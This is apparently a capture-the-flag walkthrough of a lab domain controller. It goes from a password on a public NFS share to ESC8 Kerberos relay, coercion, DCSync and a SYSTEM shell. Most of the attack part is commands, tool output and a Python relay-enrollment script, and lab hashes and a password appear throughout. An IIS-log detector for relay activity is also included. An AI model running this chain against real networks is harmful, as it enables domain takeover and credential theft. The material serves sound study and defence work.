Introduction
VulnCicada is a Windows Domain Controller machine with a fun twist - the initial credential is hidden inside an image on a publicly accessible file share. Once you have valid creds, the machine is vulnerable to ESC8 (ADCS web enrollment over HTTP), but with a catch: NTLM auth is fully disabled, so normal relay attacks won’t work. The solution is Kerberos relaying - a more modern technique to bypass this restriction and get a certificate as the DC machine account, which then lets you dump the Administrator hash.
Two exploitation paths are covered:
- Method 1 (Linux): bloodyAD + certipy relay + nxc coerce_plus
- Method 2 (Windows VM): join your Windows VM to the domain + RemoteKrbRelay.exe
Key Concepts
What is NFS? Network File System - a way to share folders over a network, common on Linux but also supported by Windows Server. An export published to "everyone" can be mounted by any host that can reach port 2049; with the default AUTH_SYS security NFS trusts the UID/GID the client claims, so no password is ever asked for.
What is ESC8? An ADCS (Active Directory Certificate Services) misconfiguration where the CA's web enrollment interface (/certsrv/) is reachable over plain HTTP (or over HTTPS without Extended Protection for Authentication). If you can trick a machine into authenticating to you, you can relay that authentication to the enrollment form and have the CA issue a certificate for that machine. Normally this is done with NTLM relay, but this box has NTLM disabled.
What is Kerberos Relaying? The same idea as NTLM relay, but with a Kerberos AP-REQ instead of an NTLM exchange. A crafted DNS record makes the DC connect to your machine while still requesting a service ticket for its own SPN; you forward that AP-REQ, unchanged, to the ADCS web enrollment page. It works on this box because the CA's web enrollment runs on the DC itself: the relayed ticket is encrypted with DC-JPQ225$'s key, which is exactly the key IIS on that host uses to validate it.
What is a Machine Account Certificate? A certificate issued to a computer account (e.g. DC-JPQ225$) lets you authenticate as that computer via PKINIT. Domain Controller computer accounts hold the directory replication rights (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All) that DCSync abuses, so as the DC you can pull every password hash in the domain - including Administrator's.
What is coercion? Forcing a machine to authenticate to you by calling an RPC interface it exposes (MS-EFSR for PetitPotam, MS-RPRN for PrinterBug/PrintSpooler, and so on) with a UNC path that points at your host. The machine reaches out to that host, and you intercept the authentication.
Enumeration
Nmap
ports=$(nmap -p- --min-rate=1000 -T4 <TARGET> | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
nmap -p"$ports" -sC -sV <TARGET>
Key ports to notice:
| Port | Service | Notes |
|---|---|---|
| 53 | DNS | Domain Controller indicator |
| 80 | IIS | Default page only |
| 88 | Kerberos | DC indicator |
| 389/636 | LDAP | Domain: cicada.vl |
| 445 | SMB | Signing required (NTLM turns out to be disabled too, see below) |
| 2049 | NFS | Public file share - this is the entry point |
| 5985 | WinRM | Useful later |
Update your hosts file:
echo "<TARGET> DC-JPQ225.cicada.vl cicada.vl" | sudo tee -a /etc/hosts
NFS: Find the public share
NFS is like a publicly accessible folder share. Check what’s available:
showmount -e cicada.vl
Output:
Export list for cicada.vl:
/profiles (everyone)
(everyone) means no credentials needed. Mount it:
sudo mount -t nfs -o rw cicada.vl:/profiles /mnt
ls /mnt
Output:
Administrator Daniel.Marshall Debra.Wright Jane.Carter Jordan.Francis
Joyce.Andrews Katie.Ward Megan.Simpson Richard.Gibbons Rosie.Powell Shirley.West
This is the C:\Users directory of the DC - all user home folders are exposed. Browse with tree:
tree /mnt
Most folders are empty, but two image files stand out:
/mnt/Administrator/vacation.png
/mnt/Rosie.Powell/marketing.png
Copy them to your machine and open them:
sudo cp /mnt/Administrator/vacation.png .
sudo cp /mnt/Rosie.Powell/marketing.png .
vacation.png is a generic stock photo. marketing.png shows a person at a computer with a sticky note on the monitor that reads: Cicada123
That’s the password. Someone left their credentials in a photo that was stored on a world-readable share. This is a real-world mistake that happens more often than you’d think.
Validate the Credentials
Try the credentials with NetExec (nxc):
nxc smb DC-JPQ225.cicada.vl -u Rosie.Powell -p Cicada123
Output: STATUS_NOT_SUPPORTED. nxc authenticates with NTLM by default, and the DC refuses it outright - NTLM is completely disabled on this DC.
You need to use Kerberos authentication instead. First sync your clock with the DC (Kerberos rejects requests whose timestamp is more than 5 minutes off, the default allowed skew):
sudo ntpdate -u cicada.vl
Now try again with -k (Kerberos):
nxc smb DC-JPQ225.cicada.vl -u Rosie.Powell -p Cicada123 -k
Output: [+] cicada.vl\Rosie.Powell:Cicada123 ✅
You now have: Rosie.Powell : Cicada123
Enumerate shares
nxc smb DC-JPQ225.cicada.vl -u Rosie.Powell -p Cicada123 -k --shares
You'll spot a CertEnroll share. That share is created when an Enterprise CA is installed (it holds the CA certificate and CRLs), so ADCS is installed on this DC.
Enumerate ADCS for Vulnerabilities
certipy find -target DC-JPQ225.cicada.vl \
-u Rosie.Powell@cicada.vl -p Cicada123 \
-k -vulnerable -stdout
Key output:
CA Name : cicada-DC-JPQ225-CA
Web Enrollment
HTTP : Enabled ← HTTP (not HTTPS) = vulnerable
HTTPS : Disabled
[!] Vulnerabilities
ESC8 : Web Enrollment is enabled over HTTP.
ESC8 explained: the CA's web enrollment pages (http://dc-jpq225.cicada.vl/certsrv/) are served over plain HTTP, so nothing binds the authentication to the channel it arrived on. Whoever authenticates to the enrollment form can submit a CSR and have a certificate issued for that identity. Normally you'd relay NTLM there - but NTLM is disabled here, so we relay Kerberos instead.
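The HTTP half of that relay, as an added example that is not code from this writeup or from Certipy: it builds the form POST that certfnsh.asp accepts, forwards the victim's SPNEGO token in the Authorization header, and fetches the issued certificate by request ID. The form fields and URLs are the ones certsrv really uses; the CSR, the token, CA_HOST and the fake_ca stand-in are constructed placeholders so it runs offline with the standard library only.

```python
"""Added example (not from the writeup): the HTTP side of an ESC8 relay.

The form fields and URLs are the ones IIS's certsrv pages really use; CA_HOST,
the CSR, the SPNEGO token and the stand-in server are constructed placeholders
so the exchange can be run offline with the standard library only.
"""
import base64
import re
from typing import Callable, Dict, Optional, Tuple
from urllib.parse import quote

CA_HOST = "dc-jpq225.cicada.vl"         # the CA host from the writeup
ENROLL_PATH = "/certsrv/certfnsh.asp"   # handles the 'newreq' form submission
CERT_PATH = "/certsrv/certnew.cer"      # serves an issued certificate by ReqID

# One persistent, authenticated HTTP connection, abstracted as a callable:
# (method, path, headers, body) -> (status, response_text)
Transport = Callable[[str, str, Dict[str, str], Optional[str]], Tuple[int, str]]


def build_enrollment_request(csr_pem: str, template: str, spnego_token: bytes):
    """Build the POST that submits a CSR. The relayed token is the SPNEGO blob
    the victim sent in its SMB session setup (it wraps the Kerberos AP-REQ);
    forwarding it unchanged in the Authorization header is the whole relay."""
    body = ("Mode=newreq"
            f"&CertRequest={quote(csr_pem, safe='')}"
            f"&CertAttrib=CertificateTemplate:{template}"
            "&TargetStoreFlags=0&SaveCert=yes&ThumbPrint=")
    headers = {
        "Host": CA_HOST,
        "Authorization": "Negotiate " + base64.b64encode(spnego_token).decode(),
        "Content-Type": "application/x-www-form-urlencoded",
        "Content-Length": str(len(body)),
    }
    return ENROLL_PATH, headers, body


_REQ_ID = re.compile(r"certnew\.cer\?ReqID=(\d+)&")


def parse_request_id(html: str) -> Optional[int]:
    """An issued request comes back with a link to certnew.cer?ReqID=N.
    No link means the CA denied it or parked it for manager approval."""
    m = _REQ_ID.search(html)
    return int(m.group(1)) if m else None


def cert_download_path(req_id: int) -> str:
    return f"{CERT_PATH}?ReqID={req_id}&Enc=b64"   # Enc=b64 returns PEM


def relay_enrollment(send: Transport, csr_pem: str, template: str, spnego_token: bytes) -> str:
    """Submit the CSR under the relayed identity, then fetch the certificate.
    The GET carries no Authorization header on purpose: a Kerberos AP-REQ
    cannot be replayed, so the download must ride the same authenticated
    keep-alive connection that the POST used."""
    path, headers, body = build_enrollment_request(csr_pem, template, spnego_token)
    status, html = send("POST", path, headers, body)
    if status == 401:
        raise RuntimeError("Negotiate token rejected: wrong service key, replay, or EPA enforced")
    req_id = parse_request_id(html)
    if req_id is None:
        raise RuntimeError("no ReqID in response: request denied or pending, check the template")
    status, pem = send("GET", cert_download_path(req_id), {"Host": CA_HOST}, None)
    if status != 200 or not pem.startswith("-----BEGIN CERTIFICATE-----"):
        raise RuntimeError(f"unexpected download body for ReqID {req_id}")
    return pem


# --- constructed stand-ins so the example runs without a CA ----------------
SAMPLE_CSR = ("-----BEGIN CERTIFICATE REQUEST-----\n"
              "MIIBConstructedNotARealCSR\n"
              "-----END CERTIFICATE REQUEST-----\n")
SAMPLE_TOKEN = b"\x60\x82\x05\x00constructed-spnego-blob"   # not a real AP-REQ
SAMPLE_CERT = ("-----BEGIN CERTIFICATE-----\n"
               "MIIConstructedNotARealCert\n"
               "-----END CERTIFICATE-----\n")


def fake_ca(method, path, headers, body):
    """Minimal imitation of certsrv: accepts any Negotiate token, issues only
    DomainController requests, serves the certificate for ReqID 88."""
    if method == "POST" and path == ENROLL_PATH:
        if not headers.get("Authorization", "").startswith("Negotiate "):
            return 401, ""
        if "CertificateTemplate:DomainController" not in body or "CertRequest=" not in body:
            return 200, "<html><body>Your certificate request was denied.</body></html>"
        return 200, ('<html><body>Certificate Issued '
                     '<a href="certnew.cer?ReqID=88&amp;Enc=b64">Download certificate</a>'
                     '</body></html>')
    if method == "GET" and path == cert_download_path(88):
        return 200, SAMPLE_CERT
    return 404, ""


if __name__ == "__main__":
    print(relay_enrollment(fake_ca, SAMPLE_CSR, "DomainController", SAMPLE_TOKEN))
```

Two things in here are the ones that bite in practice: the certificate download has to reuse the connection the POST authenticated (an AP-REQ is single-use, so a fresh connection gets a 401), and a response without a certnew.cer link is not an error from IIS but a denied or pending request, which usually means the wrong template for the relayed identity.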
Exploitation: Method 1 (Linux / Kerberos Relay via SMB)
This method works entirely from your Linux attack machine.
How it works
The trick is a special DNS record. You add a record whose name starts with the DC's own hostname and ends in a crafted suffix, pointing at your IP. When coerced to connect to that name, the DC resolves it to your machine but still asks the KDC for a ticket to its own service, so it hands you a Kerberos AP-REQ for DC-JPQ225. You then relay that AP-REQ to the ADCS HTTP enrollment page.
Step 1: Add the magic DNS entry
The DNS record name is a specially crafted string. Replace <YOUR_IP> with your tun0 IP:
bloodyAD -u Rosie.Powell -p Cicada123 -d cicada.vl -k \
--host DC-JPQ225.cicada.vl \
add dnsRecord DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA <YOUR_IP>
Output: [+] DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA has been successfully added
Why this specific string? The name has two parts. The prefix DC-JPQ225 is the DC's own hostname. The suffix (1UWhRC...YBAAAA) is a marshaled CREDENTIAL_TARGET_INFORMATION structure in the format Windows' CredMarshalTargetInfo appends to a target name; it carries no names, only flags, so the same suffix is used for every target. The SMB client resolves the full name through DNS and reaches your IP, but the Kerberos SSP unmarshals and strips the suffix before building the SPN, so the DC requests a ticket for cifs/DC-JPQ225 - for itself - and sends that AP-REQ to you. This is the "magic" behind Kerberos relay over SMB, and it is why the prefix must be the DC's exact hostname: a different prefix gets you a ticket for a service the CA host cannot decrypt.
Step 2: Start the Certipy relay listener
In a new terminal, start the relay. It listens on port 445 (SMB), so make sure nothing else on your box is bound to 445 first, and forwards the Kerberos AP-REQ it receives to the ADCS HTTP enrollment endpoint:
certipy relay -target 'http://dc-jpq225.cicada.vl/' -template DomainController
Output:
[*] Targeting http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp (ESC8)
[*] Listening on 0.0.0.0:445
[*] Setting up SMB Server on port 445
Note: Make sure you're using a recent version of certipy that includes the relay option. Install via: pip install certipy-ad
Step 3: Coerce the DC to authenticate to you
In a third terminal, use nxc’s coerce_plus module with the PetitPotam method to force the DC to reach out and authenticate to your fake DNS entry:
nxc smb DC-JPQ225.cicada.vl -u Rosie.Powell -p Cicada123 -k \
-M coerce_plus \
-o LISTENER=DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA METHOD=PetitPotam
What is PetitPotam? A coercion technique that calls MS-EFSR functions (EfsRpcOpenFileRaw and several siblings) with a UNC path, which makes the target machine authenticate to the hostname you name in that path. Essentially it "coerces" the DC into reaching out to you.
Step 4: Catch the certificate
Back in your relay terminal, you’ll see:
[*] Authenticating against http://dc-jpq225.cicada.vl as / SUCCEED
[*] Requesting certificate for '\\' based on the template 'DomainController'
[*] Certificate issued with request ID 88
[*] Got certificate with DNS Host Name 'DC-JPQ225.cicada.vl'
[*] Saved certificate and private key to 'dc-jpq225.pfx'
You now have dc-jpq225.pfx - a certificate for the DC machine account!
Step 5: Authenticate as the DC machine account
Use the certificate to authenticate with PKINIT: certipy obtains a TGT for DC-JPQ225$ and then recovers the account's NT hash from the PAC (the U2U trick), so you get both a ticket cache and a hash:
certipy auth -pfx dc-jpq225.pfx -dc-ip <TARGET>
Output:
[*] Using principal: 'dc-jpq225$@cicada.vl'
[*] Got TGT
[*] Saving credential cache to 'dc-jpq225.ccache'
[*] Got hash for 'dc-jpq225$@cicada.vl':
aad3b435b51404eeaad3b435b51404ee:a65952c664e9cf5de60195626edbeee3
You have a .ccache file (Kerberos ticket) for the DC machine account.
Step 6: DCSync to get Administrator’s hash
The DC machine account has the right to replicate (sync) all domain credentials. Use secretsdump with the .ccache file to dump the Administrator hash:
KRB5CCNAME=dc-jpq225.ccache secretsdump.py \
-k -no-pass \
cicada.vl/dc-jpq225\$@dc-jpq225.cicada.vl \
-just-dc-user administrator
KRB5CCNAME=... tells Kerberos tools to use your saved ticket instead of asking for a password.
Output:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:85a0da53871a9d56b6cd05deda3a5e87:::
Administrator NTLM hash: 85a0da53871a9d56b6cd05deda3a5e87
Step 7: Get a shell
Since NTLM is disabled, combine -k with the hash: impacket uses the NT hash as the RC4 Kerberos key to request a TGT (overpass-the-hash), so no NTLM exchange happens on the wire:
impacket-psexec cicada.vl/administrator@DC-JPQ225.cicada.vl \
-k -hashes :85a0da53871a9d56b6cd05deda3a5e87
C:\Windows\system32> whoami
nt authority\system
Flags are at:
C:\Users\Administrator\Desktop\user.txt
C:\Users\Administrator\Desktop\root.txt
Exploitation: Method 2 (Windows VM / RemoteKrbRelay)
This is an alternative approach using a Windows VM joined to the domain. Useful if you prefer a Windows workflow or if Method 1 doesn’t work.
Step 1: Check the Machine Account Quota
By default any authenticated user can create computer objects, and therefore join machines to the domain, up to the ms-DS-MachineAccountQuota limit. Check it:
nxc ldap DC-JPQ225.cicada.vl -u Rosie.Powell -p Cicada123 -k -M maq
Output: MachineAccountQuota: 10
This means any domain user can join up to 10 computers. So you can join your Windows VM to cicada.vl using Rosie.Powell’s credentials.
Step 2: Join your Windows VM to the domain
On your Windows VM:
- Set the DNS server to the DC's IP (<TARGET>) in your VPN adapter's IPv4 settings
- Make sure IPv6 is enabled on the adapter
- Go to System Properties → Computer Name → Change → select Domain → type cicada.vl → enter rosie.powell : Cicada123 when prompted
- Reboot when prompted - "Welcome to the cicada.vl domain"
Step 3: Run RemoteKrbRelay
Download and compile RemoteKrbRelay, then run:
.\RemoteKrbRelay.exe -adcs -template DomainController `
-victim dc-jpq225.cicada.vl `
-target dc-jpq225.cicada.vl `
-clsid d99e6e74-fc88-11d0-b498-00a0c90312f3
What is a CLSID? A COM class ID. RemoteKrbRelay activates a COM object on the DC that runs as SYSTEM, which forces the DC to authenticate back to you. The CLSID d99e6e74-fc88-11d0-b498-00a0c90312f3 identifies the specific COM class that works for this coercion.
Output:
[+] Got Krb Auth from NT/System. Relaying to ADCS now...
[+] Received Kerberos Auth from dc-jpq225.cicada.vl
[+] HTTP session established
[+] Success (ReqID: 17)
[+] Certificate in PKCS12: MIACAQ<SNIP>
Step 4: Convert and use the certificate
Back on Linux, base64-decode the PKCS#12 blob (paste it as one unbroken string):
echo "MIACA<SNIP>" | base64 -d > dc.pfx
Then follow the exact same steps as Method 1 from Step 5 onwards (certipy auth → secretsdump → psexec).
Summary
NFS share (everyone) → mount /profiles → image files
↓
marketing.png → password on sticky note: Cicada123
↓
Rosie.Powell : Cicada123 (NTLM disabled - use -k for Kerberos)
↓
certipy find → ESC8: HTTP web enrollment enabled on cicada-DC-JPQ225-CA
↓
── Method 1 (Linux) ──────────────────────────────────────
bloodyAD → add magic DNS record pointing to attacker IP
certipy relay → listen on port 445, forward to ADCS HTTP
nxc coerce_plus PetitPotam → force DC to authenticate to DNS entry
↓
── Method 2 (Windows VM) ─────────────────────────────────
Join Windows VM to cicada.vl domain (MAQ=10, any user can join)
RemoteKrbRelay.exe → force SYSTEM to relay Kerberos to ADCS
↓
Both methods → dc-jpq225.pfx (certificate as DC machine account)
↓
certipy auth -pfx dc-jpq225.pfx → dc-jpq225.ccache + machine hash
↓
KRB5CCNAME=dc-jpq225.ccache secretsdump → Administrator hash: 85a0da5387...
↓
impacket-psexec -k -hashes → nt authority\system → flags
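Both methods end with the DC's own identity submitting a form on the CA's web interface, and that is visible in the CA's IIS log. As an added example (not part of the writeup, and not a tool from it), here is a small checker that parses IIS W3C log text and flags certfnsh.asp submissions that look like a relayed machine identity. SAMPLE_LOG is constructed: its #Fields: line follows IIS's default field selection, but a real log declares its own order and the parser reads that header rather than assuming one. The mapping from computer account to the address it legitimately authenticates from is likewise an assumption the analyst supplies; for a CA that sits on the DC, as on this box, the CA's own address is the right value.

```python
"""Added example (not from the writeup): spotting ESC8 relay activity in the
CA's IIS log.

SAMPLE_LOG is constructed. Its #Fields: line follows IIS's default W3C
selection; a real log declares its own order, which parse_w3c honours.
The machine-to-address map is likewise an assumption the analyst supplies.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional

SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2025-01-10 10:02:11 10.10.10.5 GET /certsrv/ - 80 CICADA\\Rosie.Powell 10.10.10.20 Mozilla/5.0 - 200 0 0 15
2025-01-10 10:02:40 10.10.10.5 POST /certsrv/certfnsh.asp - 80 CICADA\\DC-JPQ225$ 10.10.14.3 Mozilla/5.0 - 200 0 0 312
2025-01-10 10:02:41 10.10.10.5 GET /certsrv/certnew.cer ReqID=88&Enc=b64 80 CICADA\\DC-JPQ225$ 10.10.14.3 Mozilla/5.0 - 200 0 0 7
2025-01-10 10:05:02 10.10.10.5 POST /certsrv/certfnsh.asp - 443 CICADA\\Jane.Carter 10.10.10.21 Mozilla/5.0 - 200 0 0 290
"""

ENROLL_STEM = "/certsrv/certfnsh.asp"


@dataclass
class Finding:
    time: str
    user: str
    client_ip: str
    port: int
    reasons: List[str] = field(default_factory=list)


def parse_w3c(log: str) -> List[Dict[str, str]]:
    """Turn IIS W3C extended log text into dicts keyed by the #Fields: names.
    IIS writes '+' for spaces inside a field, so splitting on spaces is safe."""
    fields: Optional[List[str]] = None
    rows: List[Dict[str, str]] = []
    for line in log.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split(" ")
        if len(parts) == len(fields):        # skip truncated or corrupt lines
            rows.append(dict(zip(fields, parts)))
    return rows


def find_esc8_enrollments(log: str, machine_ips: Dict[str, str]) -> List[Finding]:
    """Flag certfnsh.asp submissions that look like a relayed machine identity.

    machine_ips maps a computer account (with its trailing $) to the address
    it legitimately authenticates from; an entry is optional, but without it
    the strongest signal (identity and source address disagree) is unavailable."""
    expected_ip = {k.upper(): v for k, v in machine_ips.items()}
    findings: List[Finding] = []
    for r in parse_w3c(log):
        if r.get("cs-method") != "POST" or r.get("cs-uri-stem", "").lower() != ENROLL_STEM:
            continue
        user = r.get("cs-username", "-")
        account = user.split("\\")[-1]
        port = int(r.get("s-port", "0"))
        reasons: List[str] = []
        if port == 80:
            reasons.append("enrollment form submitted over cleartext HTTP, the ESC8 precondition")
        if account.endswith("$"):
            reasons.append("machine account used the web form; machines normally enrol "
                           "through DCOM/RPC autoenrollment, not certsrv")
            known = expected_ip.get(account.upper())
            if known and known != r.get("c-ip"):
                reasons.append(f"{account} authenticated from {r.get('c-ip')} but lives at "
                               f"{known}: relayed authentication")
        if reasons:
            findings.append(Finding(r.get("time", ""), user, r.get("c-ip", ""), port, reasons))
    return findings


if __name__ == "__main__":
    for f in find_esc8_enrollments(SAMPLE_LOG, {"DC-JPQ225$": "10.10.10.5"}):
        print(f.time, f.user, f.client_ip, f.port)
        for why in f.reasons:
            print("   -", why)
```

On the sample, only the DC-JPQ225$ submission is flagged: it arrived over port 80, from a machine account, and from 10.10.14.3 rather than the DC's own address. Jane.Carter's HTTPS submission and Rosie.Powell's GET of the landing page are ignored. The same request also shows up on the CA side as audit events 4886 (request received) and 4887 (issued) naming the requester, which is the quickest cross-check when the IIS log has username logging turned off.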
Tools Used
| Tool | What it does | How to get it |
|---|---|---|
| nxc (NetExec) | Swiss army knife for AD enumeration/auth | pip install netexec |
| certipy-ad | ADCS enumeration and exploitation (relay, auth) | pip install certipy-ad |
| bloodyAD | Modify AD objects over LDAP/Kerberos | pip install bloodyAD |
| impacket-psexec | Remote shell via SMB | pip install impacket |
| secretsdump.py | Dumps domain hashes via DCSync | Part of impacket |
| RemoteKrbRelay | Kerberos relay from Windows (Method 2) | GitHub |
| ntpdate | Sync your clock with the DC (required for Kerberos) | sudo apt install ntpdate |